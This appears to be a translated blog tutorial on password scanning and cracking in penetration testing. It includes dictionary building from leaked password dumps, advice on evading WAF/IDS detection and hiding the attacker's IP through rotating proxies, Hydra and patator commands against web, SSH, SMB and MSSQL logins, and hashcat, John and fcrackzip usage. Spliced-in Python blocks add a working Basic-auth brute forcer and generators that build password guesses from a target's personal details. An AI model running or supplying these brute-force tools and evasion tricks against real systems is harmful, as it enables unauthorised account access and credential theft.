Hacking Book | Free Online Hacking Learning


Password scanning and cracking techniques in penetration testing

Posted by chiappelli at 2020-02-27

0x00 Foreword

Penetration testing always involves "passwords" and "encryption and decryption". Trying weak passwords is an essential step in any engagement: from compromising zombie machines to pass-the-hash in bulk across an intranet, from personal PCs to network equipment and industrial control systems, as long as single-factor password authentication is still in use, password scanning will not be forgotten. Below is a brief summary of password scanning and cracking skills in security testing. If there are omissions or mistakes, I hope you will point them out.

0x01 Organize a good dictionary

To crack a password we need "someone else's password", so the importance of the dictionary in password scanning is self-evident. To build a good dictionary, refer to the leaked databases of major websites, collect the password (cleartext) field, and generate a dictionary ordered by frequency of occurrence. A demo script:


import sys
from collections import Counter

# Read a leaked cleartext-password dump (one password per line), count how
# often each value occurs and print the values with the most common first.
# Usage: python3 freq.py leaked_passwords.txt > dict.txt
passwords = []
with open(sys.argv[1], 'r', encoding='utf-8', errors='ignore') as dump:
    for line in dump:
        line = line.strip('\r\n ')
        if line:
            passwords.append(line)

for password, _count in Counter(passwords).most_common():
    print(password)

0x02 A satisfactory tool set

To do a good job, one must first sharpen one's tools. For password enumeration, the tools the author recommends are listed below:

Of course, depending on specific needs (such as adding various disguises to bypass detection), we may also need to write our own scripts to enumerate accounts.

0x03 Bypassing detection

There may be a WAF in front of the web layer and an IDS/IPS in front of services, and either can raise an alarm. Before testing, determine through scanning and other methods whether such protection exists and act accordingly. The web layer may have a captcha, a per-IP limit on connections per second, or checks on cookies/headers to decide whether the client is a human or a bot. After a round of probing (how to probe is left to the reader), choose the most reasonable way to bypass or avoid the check so that account/password enumeration is not blocked by detection.

0x04 Enumerating web accounts

Common possibilities for bypassing validation:

For web enumeration, Burp Suite solves nearly every common problem, and its documentation is extensive. Open the proxy, turn on intercept, log in on the web page with a username and password, catch the request, choose Send to Intruder and switch to the Intruder tab.

There are four attack types:

Sniper: a single payload set, inserted into one position at a time while the other positions keep their original value.

Battering ram: a single payload set, with the same payload inserted into every position at once.

Pitchfork: one payload set per position, iterated in lock-step (the i-th username with the i-th password).

Cluster bomb: one payload set per position, trying every combination (every username with every password).

Reference link: http://www.digininja.org/blog/burp_intruder_types.php. After choosing the attack type, set the payload type to Runtime file, point it at the dictionary file, and untick URL-encoding of the payload. If the page hashes the password with MD5 on the client before submitting it, add an MD5 step under payload processing.

Once configured, you can also add a grep match (regular expression) on the responses, and then start the attack.
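To make the four attack types concrete, here is an added example (my own Python, not Burp's code and not from the original post) that simulates how each type fills two marked positions of a constructed request template from two tiny dictionaries. The template, usernames and passwords are illustrative values; the request counts come out as positions × payloads for Sniper, one per payload for Battering ram, the shortest list for Pitchfork and the full product for Cluster bomb.

```python
"""Simulate Burp Intruder's four attack types over a marked request template."""
import itertools
from typing import Iterator, List, Sequence, Tuple

MARK = "§"  # Burp's payload-position marker


def split_template(template: str) -> Tuple[List[str], List[str]]:
    """Split `template` at the §...§ markers.

    Returns (chunks, originals): the literal text around the positions and
    the value that originally sat inside each position (Burp keeps that value
    in positions that are not currently being attacked).
    """
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers in template")
    return parts[0::2], parts[1::2]


def render(chunks: Sequence[str], values: Sequence[str]) -> str:
    """Re-assemble the request with `values` substituted into the positions."""
    out = [chunks[0]]
    for value, chunk in zip(values, chunks[1:]):
        out.append(value)
        out.append(chunk)
    return "".join(out)


def sniper(template: str, payloads: Sequence[str]) -> Iterator[str]:
    """Sniper: one payload set, one position at a time; the other positions
    keep their original value.  Requests = positions * len(payloads)."""
    chunks, originals = split_template(template)
    for pos in range(len(originals)):
        for payload in payloads:
            values = list(originals)
            values[pos] = payload
            yield render(chunks, values)


def battering_ram(template: str, payloads: Sequence[str]) -> Iterator[str]:
    """Battering ram: one payload set, the same payload placed into every
    position at once.  Requests = len(payloads)."""
    chunks, originals = split_template(template)
    for payload in payloads:
        yield render(chunks, [payload] * len(originals))


def pitchfork(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Pitchfork: one payload set per position, walked in lock-step (the i-th
    user with the i-th password).  Requests = size of the shortest set."""
    chunks, originals = split_template(template)
    if len(payload_sets) != len(originals):
        raise ValueError("pitchfork needs exactly one payload set per position")
    for values in zip(*payload_sets):
        yield render(chunks, values)


def cluster_bomb(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Cluster bomb: one payload set per position, full Cartesian product
    (every user with every password).  Requests = product of set sizes."""
    chunks, originals = split_template(template)
    if len(payload_sets) != len(originals):
        raise ValueError("cluster bomb needs exactly one payload set per position")
    for values in itertools.product(*payload_sets):
        yield render(chunks, values)


# Constructed demo input: a login body with two marked positions and two very
# short dictionaries.  Illustrative values only, not from a real target.
TEMPLATE = "username=§admin§&password=§123456§"
USERS = ["admin", "root"]
PASSWORDS = ["123456", "admin", "password"]


def request_counts(template: str = TEMPLATE,
                   users: Sequence[str] = USERS,
                   passwords: Sequence[str] = PASSWORDS) -> dict:
    """How many requests each attack type sends for the same dictionaries."""
    single_set = list(users) + list(passwords)  # Sniper/Battering ram use one list
    return {
        "sniper": sum(1 for _ in sniper(template, single_set)),
        "battering_ram": sum(1 for _ in battering_ram(template, single_set)),
        "pitchfork": sum(1 for _ in pitchfork(template, [users, passwords])),
        "cluster_bomb": sum(1 for _ in cluster_bomb(template, [users, passwords])),
    }


if __name__ == "__main__":
    for name, count in request_counts().items():
        print(f"{name:14s} {count:3d} requests")
    for req in cluster_bomb(TEMPLATE, [USERS, PASSWORDS]):
        print("  ", req)
```

For a username/password login, Cluster bomb is the type that actually enumerates every pair; Pitchfork only makes sense when you already have matched user/password lists (for example from a leak), and Sniper is for probing one parameter at a time.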

During this process, if you are worried about exposing your own IP address, you can write a script that listens on a local port and picks a random proxy IP for each attempt; in Burp, set the upstream proxy to the port the local script listens on.

0x05 HTTP Basic authentication

HTTP Basic authentication is commonly seen on home routers and JBoss. During authentication the username and password are only Base64-encoded, not encrypted. Without a correct username and password the server returns

HTTP/1.1 401 Authorization Required

Logging in to the router with the default username admin and default password admin and capturing the request shows the following header in the HTTP request; many devices look exactly like this:

Authorization: Basic YWRtaW46YWRtaW4=

Base64-decoding it gives admin:admin. Burp can still be used to brute force Basic authentication, but the username and password have to be combined and Base64-encoded first. A demo script:

import base64

# Combine every username with every password as "user:pass", Base64-encode the
# pair the way the Authorization header expects, and write one token per line
# so the output file can be loaded directly as an Intruder runtime-file payload.
userfile = input("input usr file:")
passfile = input("input pwd file:")
outputname = input("input out file:")

with open(userfile) as userInfile, open(passfile) as passInfile:
    userLines = userInfile.readlines()
    passLines = passInfile.readlines()

with open(outputname, "w") as outputfile:
    for userLine in userLines:
        for passLine in passLines:
            combinedLine = userLine.strip() + ':' + passLine.strip()
            print(combinedLine)
            token = base64.b64encode(combinedLine.encode()).decode()
            outputfile.write(token + '\n')

After generating the dictionary, it can be brute-forced with Burp (leave payload processing and encoding off, since the tokens are already Base64).

Of course, Hydra offers a simpler route:

hydra -L user.txt -P pass.txt -F http://demourl:2048/auth

Here upper-case -L and -P load the username and password dictionaries, -F stops the whole run once a valid pair is found (lower-case -f stops per host), and -t can be added to set the number of parallel tasks.
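As an added example (not from the original post), here is the whole Basic-auth flow end to end in Python: decode a captured header, build the user:password tokens, and run the dictionary against a stand-in target that is a throw-away local http.server accepting only admin:admin. The target, the two dictionaries and the /auth path are all constructed for the demo; the loop stops at the first valid pair, which is what hydra -F does.

```python
"""Brute-force HTTP Basic authentication against a constructed local target."""
import base64
import binascii
import itertools
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Iterable, Optional, Tuple

# Constructed demo data: the credential the stand-in target accepts, and two
# short dictionaries (illustrative only, not taken from a real device).
TARGET_USER, TARGET_PASS = "admin", "admin"
USERS = ["root", "admin"]
PASSWORDS = ["123456", "password", "admin"]


def basic_header(user: str, password: str) -> str:
    """Build the Authorization value: 'Basic ' + base64('user:password')."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def parse_basic_header(value: str) -> Optional[Tuple[str, str]]:
    """Decode an Authorization header back to (user, password), or None if it
    is not well-formed Basic auth.  Base64 is an encoding, not encryption:
    anyone who sees the header has the credential."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


class _AuthHandler(BaseHTTPRequestHandler):
    """Stand-in protected resource: 401 + WWW-Authenticate until the pair matches."""

    def do_GET(self) -> None:
        creds = parse_basic_header(self.headers.get("Authorization", ""))
        if creds == (TARGET_USER, TARGET_PASS):
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="demo"')
            self.end_headers()

    def log_message(self, *args) -> None:  # keep the demo output quiet
        pass


def start_target() -> Tuple[HTTPServer, str]:
    """Start the constructed target on an ephemeral localhost port."""
    server = HTTPServer(("127.0.0.1", 0), _AuthHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/auth"


# Opener without a proxy handler, so a system http_proxy cannot divert the demo.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(url: str, user: str, password: str) -> bool:
    """One attempt: True on HTTP 200, False on 401; anything else is raised."""
    req = urllib.request.Request(url, headers={"Authorization": basic_header(user, password)})
    try:
        with _OPENER.open(req, timeout=5) as resp:
            return resp.getcode() == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise


def brute_force(url: str, users: Iterable[str],
                passwords: Iterable[str]) -> Tuple[Optional[Tuple[str, str]], int]:
    """Try every user/password pair in dictionary order and stop at the first
    hit (hydra's -F behaviour).  Returns ((user, password) or None, attempts)."""
    attempts = 0
    for user, password in itertools.product(list(users), list(passwords)):
        attempts += 1
        if try_login(url, user, password):
            return (user, password), attempts
    return None, attempts


def demo() -> Tuple[Optional[Tuple[str, str]], int]:
    """Spin up the stand-in target, run the attack against it, tear it down."""
    server, url = start_target()
    try:
        return brute_force(url, USERS, PASSWORDS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    found, attempts = demo()
    print(f"found {found} after {attempts} attempts")
```

Against a real device the same loop would need the rate-limit and lockout considerations from 0x03; the point here is that the server only ever sees a Base64 token, so any header captured on the wire (or in a proxy log) is the password itself.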

0x06 Service enumeration

Password cracking cannot avoid services. For common services such as FTP / SSH / Telnet / POP3 / MSSQL (1433) the documentation is complete, so only the commands are briefly recorded here. FTP:

hydra -L user.txt -P pass.txt -F

SSH (with hydra, or with patator filtering out the failure message):
hydra -L user.txt -P pass.txt -F ssh://

patator ssh_login host= user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'

SMB:
hydra -L user.txt -P pass.txt -F smb://

MSSQL:
hydra -L user.txt -P pass.txt -F mssql://

0x07 Social-engineering dictionary generation

Password guessing comes in two kinds: weak passwords such as admin, and "social engineering" passwords such as a name followed by a birthday in the form *19x0101. If weak-password attempts fail and you have a good grasp of the target's personal information, you can try generating a social-engineering dictionary. Take the cupp.py tool as an example and create a new dictionary:

After filling in the relevant information, generate the dictionary and continue enumerating with the tools above ;-)

0x08 Hash cracking

Under Windows, tools such as WCE grab passwords directly from memory, but offline cracking after dumping hashes is often unavoidable, especially since Microsoft's recent patches :( Ordinary hashes can be cracked with ophcrack; the official site offers rainbow tables for download and an online lookup as well: http://www.objectif-securite.ch/en/ophcrack.php. If you have to crack an uncommon hash type that the existing online cracking services cannot handle, there are for now only three relatively efficient methods:

If the password follows a pattern, we can crack it with rules. For example, create an account with the password hahaharoot: John's brute-force (incremental) mode would struggle to finish on an ordinary computer within a day, but if we notice that the administrator's other passwords, such as for the web application or SQL, all start with hahaha, we can define a mask, for example

hashcat -m1800 -a3 hashdumpedfile --pw-min=7 --pw-max=11 "hahaha?l?l?l?l"

and the plaintext comes out within a few seconds.

Here -m specifies the hash type (1800 is sha512crypt, the Linux /etc/shadow format) and -a 3 selects the brute-force (mask) attack. Note that --pw-min/--pw-max belong to the older hashcat command line; current versions use --increment with --increment-min and --increment-max instead. Alternatively, generate a dictionary with the known prefix using a script and load it into a tool:

john -w:gen_wordlist.txt hash
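An added example (my own code, not cupp, John or hashcat, and not from the original post) covering both the social-engineering dictionary of 0x07 and the known-prefix mask of 0x08: it builds cupp-style candidates from a fictitious profile, expands hashcat-style masks with the increment behaviour, and checks candidates against two constructed SHA-256 hashes. SHA-256 stands in for the sha512crypt hash of the text so the demo runs in seconds; the candidate generation is the point, not the hash mode.

```python
"""Targeted candidate generation for offline cracking: cupp-style words built
from a personal profile, and hashcat-style masks with a known prefix."""
import hashlib
import itertools
import string
from typing import Dict, Iterable, Iterator, List, Optional

# hashcat's built-in charsets (?a is the union of the four)
CHARSETS: Dict[str, str] = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": string.punctuation + " ",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]
LEET = str.maketrans("aeios", "43105")  # a->4 e->3 i->1 o->0 s->5


def mask_slots(mask: str) -> List[str]:
    """Tokenise a mask such as 'hahaha?l?l?l?l' into one alphabet per character
    slot: literals stay literal, '?x' becomes charset x, '??' is a literal '?'."""
    slots: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            slots.append(mask[i])
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        key = mask[i + 1]
        slots.append("?" if key == "?" else CHARSETS[key])
        i += 2
    return slots


def expand_mask(mask: str, min_len: Optional[int] = None,
                max_len: Optional[int] = None) -> Iterator[str]:
    """Yield every candidate the mask describes.  With min_len/max_len the mask
    is truncated slot by slot and each length is tried in turn, which is what
    hashcat's --increment-min/--increment-max do."""
    slots = mask_slots(mask)
    lo = len(slots) if min_len is None else min_len
    hi = len(slots) if max_len is None else min(max_len, len(slots))
    for length in range(lo, hi + 1):
        for combo in itertools.product(*slots[:length]):
            yield "".join(combo)


def profile_candidates(profile: Dict[str, str]) -> List[str]:
    """cupp-style list from a target profile: name/nick/pet words in a few case
    and leet forms, combined with birth-date fragments and common suffixes.
    Order is preserved and duplicates are removed."""
    birth = profile.get("birth", "")  # expected as YYYYMMDD
    words = [profile[k].lower() for k in ("name", "surname", "nick", "pet") if profile.get(k)]
    affixes = ["", "123", "!", "@123"]
    if len(birth) == 8:
        affixes += [birth, birth[:4], birth[2:4], birth[4:], birth[6:]]  # full, YYYY, YY, MMDD, DD
    seen, out = set(), []

    def add(candidate: str) -> None:
        if candidate not in seen:
            seen.add(candidate)
            out.append(candidate)

    for word in words:
        for form in (word, word.capitalize(), word.upper(), word.translate(LEET)):
            for affix in affixes:
                add(form + affix)
                if affix:
                    add(affix + form)
    for first, second in itertools.permutations(words, 2):
        add(first + second)
    return out


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def crack(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Hash each candidate and compare; None once the list is exhausted."""
    for candidate in candidates:
        if sha256_hex(candidate) == target_hex:
            return candidate
    return None


# Constructed demo data: a fictitious profile and two unsalted SHA-256 hashes.
DEMO_PROFILE = {"name": "zhang", "nick": "hahaha", "birth": "19900101"}
PROFILE_HASH = sha256_hex("Zhang0101")   # name + MMDD, the "social" pattern
MASK_HASH = sha256_hex("hahaharoot")     # known prefix + four lowercase letters


def demo() -> Dict[str, Optional[str]]:
    return {
        "profile": crack(PROFILE_HASH, profile_candidates(DEMO_PROFILE)),
        "mask": crack(MASK_HASH, expand_mask("hahaha?l?l?l?l", min_len=7, max_len=10)),
    }


if __name__ == "__main__":
    print(len(profile_candidates(DEMO_PROFILE)), "profile candidates")
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The profile list stays small (a few hundred entries) because every candidate encodes something known about the target; the mask run is the opposite trade-off, a few hundred thousand candidates that are still cheap because the prefix fixes six of ten characters. Writing either list to a file gives the gen_wordlist.txt that john -w: expects.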

0x09 File passwords

Finally, a note on cracking file passwords. The traditional ZIP encryption is much weaker than RAR's, so such archives are very likely to be recovered (a ZIP that uses AES encryption does not share this weakness). The command for the cracking tool under Kali is:

fcrackzip -b -v -c a -l 1-4 -u 1.zip

Here -b selects brute force, -v shows details, -c a restricts the character set to lowercase letters, -l 1-4 sets the password length to 1 to 4 characters, and -u tests each candidate by actually unzipping (add it, otherwise many false positives appear).

As for cracking the passwords of other document formats, if you have efficient tools, please share them.

Reward: 110 RMB, paid to the author's account on May 28.
